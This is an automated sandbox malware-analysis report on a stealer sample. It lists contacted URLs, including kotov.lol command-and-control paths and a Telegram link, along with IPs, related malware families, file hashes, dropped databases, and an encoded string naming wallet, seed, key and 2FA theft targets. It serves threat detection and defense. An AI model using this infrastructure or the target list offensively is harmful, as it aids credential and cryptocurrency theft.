                                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016file.exe, 00000000.00000002.2494877300.0000000005ADA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1985870675.0000000005ABA000.00000004.00000020.00020000.00000000.sdmp, IJDBKK.0.drfalse
                                                                              		high
                                                                              https://www.ecosia.org/newtab/JEHJKJ.0.drfalse
                                                                                		high
                                                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000002.2496772342.000000000631C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://kotov.lolHCIIIJJJngfile.exe, 00000000.00000002.2492376383.00000000005A1000.00000040.00000001.01000000.00000003.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://kotov.lol/1Dfile.exe, 00000000.00000002.2493161809.0000000000DC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  		unknown
                                                                                  https://ac.ecosia.org/autocomplete?q=JEHJKJ.0.drfalse
                                                                                    		high
                                                                                    https://play.google.com/log?format=json&hasfast=truechromecache_72.4.drfalse
                                                                                      		high
                                                                                      https://kotov.lol/4file.exe, 00000000.00000002.2493161809.0000000000DC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: malware
                                                                                      		unknown
                                                                                      https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgfile.exe, 00000000.00000002.2494877300.0000000005B98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2495560778.0000000005EB5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2496468955.00000000060BE000.00000004.00000020.00020000.00000000.sdmp, JEHIJD.0.drfalse
                                                                                        		high
                                                                                        https://kotov.lol/2file.exe, 00000000.00000003.1834253831.0000000000DD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: malware
                                                                                        		unknown
                                                                                        https://kotov.lol/rsfile.exe, 00000000.00000002.2496468955.0000000006018000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: malware
                                                                                        		unknown
                                                                                        https://kotov.lol/.file.exe, 00000000.00000003.1858814193.0000000000DD3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1834253831.0000000000DD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: malware
                                                                                        		unknown
                                                                                        https://kotov.lolECAAKKFHfile.exe, 00000000.00000002.2492376383.00000000004EE000.00000040.00000001.01000000.00000003.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://t.me/gv4dlpg88paMozilla/5.0file.exe, 00000000.00000003.1724777363.0000000004A10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://kotov.lolRPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqYfile.exe, 00000000.00000002.2492376383.000000000047B000.00000040.00000001.01000000.00000003.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesfile.exe, 00000000.00000002.2494877300.0000000005AB6000.00000004.00000020.00020000.00000000.sdmp, IJDBKK.0.drfalse
                                                                                            		high
                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=JEHJKJ.0.drfalse
                                                                                              		high

                                                                                              World Map of Contacted IPs

                                                                                              • No. of IPs < 25%
                                                                                              • 25% < No. of IPs < 50%
                                                                                              • 50% < No. of IPs < 75%
                                                                                              • 75% < No. of IPs

                                                                                              Public IPs

                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                              239.255.255.250
                                                                                              		unknownReserved
                                                                                              		unknownunknownfalse
                                                                                              95.217.25.228
                                                                                              		kotov.lolGermany
                                                                                              		24940HETZNER-ASDEtrue
                                                                                              149.154.167.99
                                                                                              		t.meUnited Kingdom
                                                                                              		62041TELEGRAMRUfalse
                                                                                              142.250.181.100
                                                                                              		www.google.comUnited States
                                                                                              		15169GOOGLEUSfalse

                                                                                              Private

                                                                                              IP
                                                                                              192.168.2.4
                                                                                              127.0.0.1

                                                                                              General Information

                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                              Analysis ID:1565632
                                                                                              Start date and time:2024-11-30 11:33:04 +01:00
                                                                                              Joe Sandbox product:CloudBasic
                                                                                              Overall analysis duration:0h 5m 20s
                                                                                              Hypervisor based Inspection enabled:false
                                                                                              Report type:full
                                                                                              Cookbook file name:default.jbs
                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                              Number of analysed new started processes analysed:11
                                                                                              Number of new started drivers analysed:0
                                                                                              Number of existing processes analysed:0
                                                                                              Number of existing drivers analysed:0
                                                                                              Number of injected processes analysed:0
                                                                                              Technologies:
                                                                                              • HCA enabled
                                                                                              • EGA enabled
                                                                                              • AMSI enabled
                                                                                              Analysis Mode:default
                                                                                              Analysis stop reason:Timeout
                                                                                              Sample name:file.exe
                                                                                              Detection:MAL
                                                                                              Classification:mal100.troj.spyw.evad.winEXE@18/28@6/6
                                                                                              EGA Information:
                                                                                              • Successful, ratio: 100%
                                                                                              HCA Information:Failed
                                                                                              Cookbook Comments:
                                                                                              • Found application associated with file extension: .exe

                                                                                              Warnings

                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                              • Excluded IPs from analysis (whitelisted): 2.20.68.210, 216.58.208.227, 172.217.19.238, 74.125.205.84, 34.104.35.123, 192.229.221.95, 172.217.21.35, 199.232.210.172, 172.217.19.202, 172.217.17.42, 172.217.19.10, 172.217.19.234, 142.250.181.106, 172.217.17.74, 104.208.16.94
                                                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, ogads-pa.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, login.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, clients.l.google.com, www.gstatic.com, onedsblobprdcus16.centralus.cloudapp.azure.com
                                                                                              • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                              • VT rate limit hit for: file.exe

                                                                                              Simulations

                                                                                              Behavior and APIs

                                                                                              TimeTypeDescription
                                                                                              05:34:30API Interceptor140x Sleep call for process: file.exe modified
                                                                                              05:35:17API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                              Joe Sandbox View / Context

                                                                                              IPs

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              239.255.255.250file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                  file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                      file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, StealcBrowse
                                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                              file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                  95.217.25.228file.exeGet hashmaliciousVidarBrowse
                                                                                                                    149.154.167.99http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                                                                                                                    • telegram.org/img/favicon.ico
                                                                                                                    http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                                                                                                                    • telegram.org/
                                                                                                                    http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                    • telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
                                                                                                                    http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                    • telegram.org/
                                                                                                                    http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                                                                                                    • telegram.org/
                                                                                                                    http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                                                                                                    • telegram.org/?setln=pl
                                                                                                                    http://makkko.kz/Get hashmaliciousUnknownBrowse
                                                                                                                    • telegram.org/
                                                                                                                    http://telegram.dogGet hashmaliciousUnknownBrowse
                                                                                                                    • telegram.dog/
                                                                                                                    LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                                                                                                    • t.me/cinoshibot
                                                                                                                    jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                                                                                    • t.me/cinoshibot

                                                                                                                    Domains

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    plus.l.google.comfile.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                                                                                    • 142.250.181.110
                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                    • 172.217.17.78
                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                    • 172.217.17.78
                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                    • 142.250.181.110
                                                                                                                    file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                                                                                    • 172.217.17.78
                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                    • 172.217.17.78
                                                                                                                    IMG_1205 #U2014 ThingLink.htmlGet hashmaliciousUnknownBrowse
                                                                                                                    • 172.217.17.78
                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                    • 172.217.17.78
                                                                                                                    https://simplebooklet.comGet hashmaliciousUnknownBrowse
                                                                                                                    • 172.217.17.78
                                                                                                                    file.exeGet hashmaliciousAmadey, Nymaim, Stealc, VidarBrowse
                                                                                                                    • 172.217.17.46
                                                                                                                    t.mefile.exeGet hashmaliciousHackBrowser, XmrigBrowse
                                                                                                                    • 49.12.234.183
                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                    • 149.154.167.99
                                                                                                                    file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                                                                                    • 149.154.167.99
                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                    • 149.154.167.99
                                                                                                                    https://go-pdf.online/abap-development-for-financial-accounting-custom-enhancements.pdfGet hashmaliciousUnknownBrowse
                                                                                                                    • 46.105.201.240
                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                    • 149.154.167.99
                                                                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                    • 149.154.167.99
                                                                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                    • 149.154.167.99
                                                                                                                    21Installer.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                    • 149.154.167.99
                                                                                                                    https://sendbot.me/seuemprestimogarantidoGet hashmaliciousUnknownBrowse
                                                                                                                    • 104.26.12.222
                                                                                                                    kotov.lolfile.exeGet hashmaliciousVidarBrowse
                                                                                                                    • 95.217.25.228
                                                                                                                    file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                                                                                    • 116.203.8.137
                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                    • 116.203.8.137

                                                                                                                    ASNs

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    TELEGRAMRUK6aOw2Jmji.exeGet hashmaliciousStealeriumBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    uyz4YPUyc9.exeGet hashmaliciousStealeriumBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                    • 149.154.167.99
                                                                                                                    yv7QsAR49V.exeGet hashmaliciousStealeriumBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    8FloezlGW7.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    jpiWvvEcbp.exeGet hashmaliciousStealeriumBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    5E3zWXveDN.exeGet hashmaliciousStealeriumBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    LKxcbzlwkz.exeGet hashmaliciousAveMaria, KeyLogger, StealeriumBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    nYkkZZbAIR.exeGet hashmaliciousStealeriumBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    MICROCHIP QFP3 22 - 25000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    HETZNER-ASDEfile.exeGet hashmaliciousHackBrowser, XmrigBrowse
                                                                                                                    • 49.12.234.183
                                                                                                                    botx.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 5.9.52.98
                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                    • 95.217.25.228
                                                                                                                    file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                                                                                    • 116.203.8.137
                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                    • 116.203.8.137
                                                                                                                    sora.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 148.251.220.125
                                                                                                                    x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                    • 148.251.134.65
                                                                                                                    .jmhgeojeri.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 144.79.6.208
                                                                                                                    ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                    • 88.99.61.52
                                                                                                                    jmggnxeedy.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 136.243.197.137

                                                                                                                    JA3 Fingerprints

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    28a2c9bd18a11de089ef85a160da29e4file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                    • 4.245.163.56
                                                                                                                    • 40.126.53.19
                                                                                                                    • 13.107.246.63
                                                                                                                    • 23.218.208.109
                                                                                                                    file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                                                                                    • 4.245.163.56
                                                                                                                    • 40.126.53.19
                                                                                                                    • 13.107.246.63
                                                                                                                    • 23.218.208.109
                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                    • 4.245.163.56
                                                                                                                    • 40.126.53.19
                                                                                                                    • 13.107.246.63
                                                                                                                    • 23.218.208.109
                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                    • 4.245.163.56
                                                                                                                    • 40.126.53.19
                                                                                                                    • 13.107.246.63
                                                                                                                    • 23.218.208.109
                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                    • 4.245.163.56
                                                                                                                    • 40.126.53.19
                                                                                                                    • 13.107.246.63
                                                                                                                    • 23.218.208.109
                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                    • 4.245.163.56
                                                                                                                    • 40.126.53.19
                                                                                                                    • 13.107.246.63
                                                                                                                    • 23.218.208.109
                                                                                                                    file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                    • 4.245.163.56
                                                                                                                    • 40.126.53.19
                                                                                                                    • 13.107.246.63
                                                                                                                    • 23.218.208.109
                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                    • 4.245.163.56
                                                                                                                    • 40.126.53.19
                                                                                                                    • 13.107.246.63
                                                                                                                    • 23.218.208.109
                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                    • 4.245.163.56
                                                                                                                    • 40.126.53.19
                                                                                                                    • 13.107.246.63
                                                                                                                    • 23.218.208.109
                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                    • 4.245.163.56
                                                                                                                    • 40.126.53.19
                                                                                                                    • 13.107.246.63
                                                                                                                    • 23.218.208.109
                                                                                                                    37f463bf4616ecd445d4a1937da06e19RezQY7jWu8.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 95.217.25.228
                                                                                                                    • 149.154.167.99
                                                                                                                    file.exeGet hashmaliciousHackBrowser, XmrigBrowse
                                                                                                                    • 95.217.25.228
                                                                                                                    • 149.154.167.99
                                                                                                                    siveria.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                    • 95.217.25.228
                                                                                                                    • 149.154.167.99
                                                                                                                    unique.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                    • 95.217.25.228
                                                                                                                    • 149.154.167.99
                                                                                                                    Fortexternal.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 95.217.25.228
                                                                                                                    • 149.154.167.99
                                                                                                                    siveria.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                    • 95.217.25.228
                                                                                                                    • 149.154.167.99
                                                                                                                    file.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                                    • 95.217.25.228
                                                                                                                    • 149.154.167.99
                                                                                                                    file.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                                    • 95.217.25.228
                                                                                                                    • 149.154.167.99
                                                                                                                    pPLD6OSn7O.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 95.217.25.228
                                                                                                                    • 149.154.167.99
                                                                                                                    pPLD6OSn7O.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 95.217.25.228
                                                                                                                    • 149.154.167.99

                                                                                                                    Dropped Files

                                                                                                                    No context

                                                                                                                    Created / dropped Files

                                                                                                                    C:\ProgramData\KJJJKFIIIJJJ\CAEHDBAAE

                                                                                                                    Download File
                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):40960
                                                                                                                    Entropy (8bit):0.8553638852307782
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                    Malicious:false
                                                                                                                    Reputation:high, very likely benign file
                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\ProgramData\KJJJKFIIIJJJ\EHDHID

                                                                                                                    Download File
                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):294912
                                                                                                                    Entropy (8bit):0.08436842005578409
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vIn:51zkVmvQhyn+Zoz67n
                                                                                                                    MD5:2CD2840E30F477F23438B7C9D031FC08
                                                                                                                    SHA1:03D5410A814B298B068D62ACDF493B2A49370518
                                                                                                                    SHA-256:49F56AAA16086F2A9DB340CC9A6E8139E076765C1BFED18B1725CC3B395DC28D
                                                                                                                    SHA-512:DCDD722C3A8AD79265616ADDDCA208E068E4ECEBE8820E4ED16B1D1E07FD52EB3A59A22988450071CFDA50BBFF7CB005ADF05A843DA38421F28572F3433C0F19
                                                                                                                    Malicious:false
                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\ProgramData\KJJJKFIIIJJJ\FBGHCGCAE

                                                                                                                    Download File
                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):49152
                                                                                                                    Entropy (8bit):0.8180424350137764
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                    Malicious:false
                                                                                                                    Reputation:high, very likely benign file
                                                                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\ProgramData\KJJJKFIIIJJJ\FIIEGD

                                                                                                                    Download File
                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):114688
                                                                                                                    Entropy (8bit):0.9746603542602881
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                    Malicious:false
                                                                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\ProgramData\KJJJKFIIIJJJ\GHIDHC

                                                                                                                    Download File
                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):126976
                                                                                                                    Entropy (8bit):0.47147045728725767
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                    MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                    SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                    SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                    SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                    Malicious:false
                                                                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\ProgramData\KJJJKFIIIJJJ\HJEHIJ

                                                                                                                    Download File
                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):98304
                                                                                                                    Entropy (8bit):0.08235737944063153
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                    Malicious:false
                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\ProgramData\KJJJKFIIIJJJ\IJDBKK

                                                                                                                    Download File
                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):159744
                                                                                                                    Entropy (8bit):0.7873599747470391
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                    MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                    SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                    SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                    SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                    Malicious:false
                                                                                                                    Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\ProgramData\KJJJKFIIIJJJ\JEHIJD

                                                                                                                    Download File
                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                    File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):9571
                                                                                                                    Entropy (8bit):5.536643647658967
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                                                                                    MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                                                                                    SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                                                                                    SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                                                                                    SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                                                                                    Malicious:false
